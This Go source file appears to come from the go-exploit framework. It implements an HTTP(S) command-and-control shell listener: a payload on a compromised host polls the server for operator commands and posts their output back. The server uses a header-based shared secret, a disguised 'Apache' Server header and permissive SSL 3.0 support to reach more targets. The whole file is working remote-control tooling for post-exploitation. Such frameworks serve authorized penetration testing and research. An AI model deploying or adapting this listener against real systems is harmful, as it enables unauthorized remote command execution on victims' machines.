package httpshellserver

import (
	"bufio"
	"crypto/tls"
	"errors"
	"flag"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	"sync"
	"sync/atomic"
	"testing"
	"time"

	"github.com/vulncheck-oss/go-exploit/c2/channel"
	"github.com/vulncheck-oss/go-exploit/encryption"
	"github.com/vulncheck-oss/go-exploit/output"
	"github.com/vulncheck-oss/go-exploit/random"
)

// Package-level state shared by GetInstance and the HTTP handlers in Run.
var (
	// singleton is the instance handed out by GetInstance; nil until first use.
	singleton   *Server
	// cliLock is held by the interactive shell goroutine for as long as it is
	// reading operator input from stdin.
	cliLock     sync.Mutex
	// commandChan carries operator commands to the handler for "/". It is
	// unbuffered, so the shell blocks on each send until a poll receives it.
	commandChan = make(chan string)
	// lastSeen is the time of the most recent authenticated request to "/";
	// it is displayed in the shell prompt.
	lastSeen    time.Time
)

// Server is an HTTP(S) shell listener. A payload polls "/" to receive queued
// operator commands and sends command output to "/rx"; both endpoints reject
// requests that do not carry the AuthHeader value in the VC-Auth header.
type Server struct {
	// The HTTP address to bind to (Init copies it from the channel's IPAddr)
	HTTPAddr string
	// The HTTP port to bind to (Init copies it from the channel's Port; 0 is rejected)
	HTTPPort int
	// Value written to the Server header of authenticated responses from "/"
	ServerField string
	// Indicates if TLS should be enabled; when set, Init loads or generates Certificate
	TLS bool
	// The file path to the user provided private key. Used only together with
	// CertificateFile; if either is empty a certificate is generated instead.
	PrivateKeyFile string
	// The file path to the user provided certificate. Used only together with
	// PrivateKeyFile; if either is empty a certificate is generated instead.
	CertificateFile string
	// Certificate loaded from the files above or generated by Init, served when TLS is set
	Certificate tls.Certificate
	// Set on the first authenticated request to "/", which also starts the
	// interactive operator shell; later requests do not start another one.
	Success bool
	// Randomly generated (20 letters) during Init, gives some sense of security where there is
	// otherwise none. Under `go test` it is the fixed value "testing-auth-header".
	// This should appear in a header with the name VC-Auth
	AuthHeader string
	// C2 channel stored by Init; holds the sessions and the shared shutdown flag.
	channel    *channel.Channel
}

// GetInstance returns the package-wide Server, allocating it on the first
// call. The lazy initialization is not synchronized, so concurrent first
// calls may race.
func GetInstance() *Server {
	if singleton != nil {
		return singleton
	}
	singleton = &Server{}

	return singleton
}

// Init validates and stores the C2 channel, generates the VC-Auth secret, and,
// when TLS is enabled, loads the user-supplied certificate/key pair or
// generates a certificate. It prints an error and returns false if the server
// cannot be used; it returns true when Run may be called.
//
// If channel.Shutdown is nil it is initialized to a fresh, unset atomic so a
// manually configured channel does not need to provide one.
func (httpServer *Server) Init(channel *channel.Channel) bool {
	// This check must come first: everything below dereferences channel.
	if channel == nil {
		output.PrintFrameworkError("Channel passed to C2 init was nil, ensure that channel is assigned and the shutdown atomic is set to false")

		return false
	}
	if channel.Shutdown == nil {
		// The zero value of atomic.Bool is false, i.e. "not shutting down".
		channel.Shutdown = new(atomic.Bool)
	}
	httpServer.channel = channel

	// A fixed secret under `go test` keeps tests deterministic.
	if testing.Testing() {
		httpServer.AuthHeader = "testing-auth-header"
	} else {
		httpServer.AuthHeader = random.RandLetters(20)
	}

	if channel.IsClient {
		output.PrintFrameworkError("Called C2HTTPServer as a client. Use lhost and lport.")

		return false
	}

	if channel.Port == 0 {
		output.PrintFrameworkError("Called HTTPShellServer without specifying a bind port.")

		return false
	}
	httpServer.HTTPAddr = channel.IPAddr
	httpServer.HTTPPort = channel.Port

	if !httpServer.TLS {
		return true
	}

	// Use the provided pair only when both halves are given; otherwise fall
	// back to a generated certificate.
	if httpServer.CertificateFile != "" && httpServer.PrivateKeyFile != "" {
		var err error
		httpServer.Certificate, err = tls.LoadX509KeyPair(httpServer.CertificateFile, httpServer.PrivateKeyFile)
		if err != nil {
			output.PrintfFrameworkError("Error loading certificate: %s", err.Error())

			return false
		}

		return true
	}

	output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
	var ok bool
	httpServer.Certificate, ok = encryption.GenerateCertificate()

	return ok
}

// CreateFlags registers this server's command-line options on the default
// flag set: the Server header value (default "Apache"), whether to use TLS,
// and optional key/certificate files for the HTTPS listener.
func (httpServer *Server) CreateFlags() {
	srv := httpServer

	flag.StringVar(&srv.ServerField,
		"httpShellServer.ServerField", "Apache",
		"The value to insert in the HTTP server field")
	flag.BoolVar(&srv.TLS,
		"httpShellServer.TLS", false,
		"Indicates if the HTTP server should use encryption")
	flag.StringVar(&srv.PrivateKeyFile,
		"httpShellServer.PrivateKeyFile", "",
		"A private key to use with the HTTPS server")
	flag.StringVar(&srv.CertificateFile,
		"httpShellServer.CertificateFile", "",
		"The certificate to use with the HTTPS server")
}

// Channel returns the C2 channel (metadata, sessions, shutdown flag) that Init
// stored on this server, or nil if Init has not stored one.
func (httpServer *Server) Channel() *channel.Channel {
	ch := httpServer.channel

	return ch
}

// Shutdown removes every session from the server's channel. It does not close
// the listener itself. It is a no-op when no channel has been set, and it
// always returns true.
func (httpServer *Server) Shutdown() bool {
	ch := httpServer.Channel()
	if ch != nil {
		output.PrintFrameworkStatus("Shutting down the HTTP Server")
		// Ranging over an empty collection is a no-op, so no length check is needed.
		for id := range ch.Sessions {
			ch.RemoveSession(id)
		}
	}

	return true
}

// Run registers the shell endpoints on http.DefaultServeMux, starts the HTTP
// listener (HTTPS when TLS is set) on HTTPAddr:HTTPPort, and blocks until the
// channel's Shutdown flag is set. It then closes the listener and removes all
// sessions.
//
// Both endpoints answer 403 Forbidden when the Vc-Auth header does not match
// AuthHeader:
//   - "/rx": a non-blank request body is printed as shell output.
//   - "/":   the payload's poll endpoint. The first authenticated request
//     starts the interactive operator shell; every authenticated request is
//     answered with at most one queued command (empty body if none waits).
//
// Shutdown is triggered by the operator typing "exit", by stdin being closed,
// by the listener failing (for example, the port is already in use), or when
// timeout seconds pass without any session having been established.
//
// Handlers are registered on the default mux, which panics on duplicate
// patterns, so Run must only be called once per process.
//
//nolint:gocognit
func (httpServer *Server) Run(timeout int) {
	http.HandleFunc("/rx", func(writer http.ResponseWriter, req *http.Request) {
		authHeader := req.Header.Get("Vc-Auth")
		if authHeader != httpServer.AuthHeader {
			writer.WriteHeader(http.StatusForbidden)
			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, authHeader, httpServer.AuthHeader)

			return
		}

		// Best effort: a truncated body still gets printed.
		body, _ := io.ReadAll(req.Body)
		if strings.TrimSpace(string(body)) != "" {
			output.PrintShell(fmt.Sprintf("%s: %s", req.RemoteAddr, string(body)))
		}
	})

	http.HandleFunc("/", func(writer http.ResponseWriter, req *http.Request) {
		authHeader := req.Header.Get("Vc-Auth")
		if authHeader != httpServer.AuthHeader {
			writer.WriteHeader(http.StatusForbidden)
			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, authHeader, httpServer.AuthHeader)

			return
		}
		lastSeen = time.Now()
		writer.Header().Set("Server", httpServer.ServerField)

		if !httpServer.Success {
			// Flip Success before spawning the shell so a poll arriving while
			// the goroutine starts up cannot launch a second shell on the same
			// stdin. The remote address is passed by value because req must
			// not be used after this handler returns.
			httpServer.Success = true
			go httpServer.runInteractiveShell(req.RemoteAddr)
		}

		// Hand over at most one queued command without blocking the poll.
		writer.WriteHeader(http.StatusOK)
		select {
		case command := <-commandChan:
			fmt.Fprint(writer, command)
		default:
		}
	})

	connectionString := fmt.Sprintf("%s:%d", httpServer.HTTPAddr, httpServer.HTTPPort)
	server := &http.Server{Addr: connectionString}
	if httpServer.TLS {
		server.TLSConfig = &tls.Config{
			Certificates: []tls.Certificate{httpServer.Certificate},
			// We have no control over the SSL versions supported on the remote target. Be permissive for more targets.
			//nolint
			MinVersion: tls.VersionSSL30,
		}
		// required to disable HTTP/2 according to https://pkg.go.dev/net/http#hdr-HTTP_2
		server.TLSNextProto = make(map[string]func(*http.Server, *tls.Conn, http.Handler), 1)
	}

	go func() {
		var err error
		if httpServer.TLS {
			output.PrintfFrameworkStatus("Starting an HTTPS server on %s...", connectionString)
			// The certificate comes from TLSConfig, so no file paths are needed.
			err = server.ListenAndServeTLS("", "")
		} else {
			output.PrintfFrameworkStatus("Starting an HTTP server on %s", connectionString)
			err = server.ListenAndServe()
		}
		// ErrServerClosed is the normal result of the Close below. Anything
		// else (e.g. a bind failure) means no connection can ever arrive, so
		// shut down now instead of idling until the timeout.
		if err != nil && !errors.Is(err, http.ErrServerClosed) {
			output.PrintfFrameworkError("HTTP server on %s failed: %s", connectionString, err.Error())
			httpServer.Channel().Shutdown.Store(true)
		}
	}()

	// Handle timeouts: give up if nothing has connected within the window.
	go func() {
		time.Sleep(time.Duration(timeout) * time.Second)
		if !httpServer.Channel().HasSessions() {
			output.PrintFrameworkError("Timeout met. Shutting down shell listener.")
			httpServer.Channel().Shutdown.Store(true)
		}
	}()

	// Block until something signals shutdown, then tear everything down.
	for !httpServer.Channel().Shutdown.Load() {
		time.Sleep(10 * time.Millisecond)
	}
	// Best effort: the process is shutting down regardless of close errors.
	_ = server.Close()
	httpServer.Shutdown()
}

// runInteractiveShell registers a session for remoteAddr and runs the operator
// prompt on stdin while holding cliLock. Each non-empty line other than "help"
// and "exit" is sent on commandChan, which blocks until the next poll of "/"
// receives it. "exit", or a read error on stdin (including EOF), sets the
// channel's Shutdown flag and returns.
func (httpServer *Server) runInteractiveShell(remoteAddr string) {
	httpServer.Channel().AddSession(nil, remoteAddr)
	output.PrintfSuccess("Received initial connection from %s, entering shell", remoteAddr)
	cliLock.Lock()
	defer cliLock.Unlock()

	// One reader for the whole session: a new bufio.Reader per prompt would
	// discard any input already buffered past the first line (e.g. several
	// commands pasted or piped in at once).
	reader := bufio.NewReader(os.Stdin)
	for {
		elapsed := time.Since(lastSeen)
		if elapsed > 10*time.Second {
			fmt.Printf("last seen: %ds> ", elapsed/time.Second)
		} else {
			fmt.Printf("last seen: %dms> ", elapsed/time.Millisecond)
		}

		line, err := reader.ReadString('\n')
		switch command := strings.TrimSpace(line); command {
		case "help":
			fmt.Printf("Usage:\nType a command and it will be added to the queue to be distributed to the first connection\ntype exit to shut everything down.\n")
		case "exit":
			output.PrintStatus("Exit received, shutting down")
			httpServer.Channel().Shutdown.Store(true)

			return
		case "":
			// Blank line: just re-prompt.
		default:
			commandChan <- command
		}

		if err != nil {
			// ReadString keeps returning io.EOF once stdin is closed; without
			// this the loop would spin forever reprinting the prompt.
			output.PrintfFrameworkError("Stopped reading commands from stdin (%s), shutting down", err.Error())
			httpServer.Channel().Shutdown.Store(true)

			return
		}
	}
}
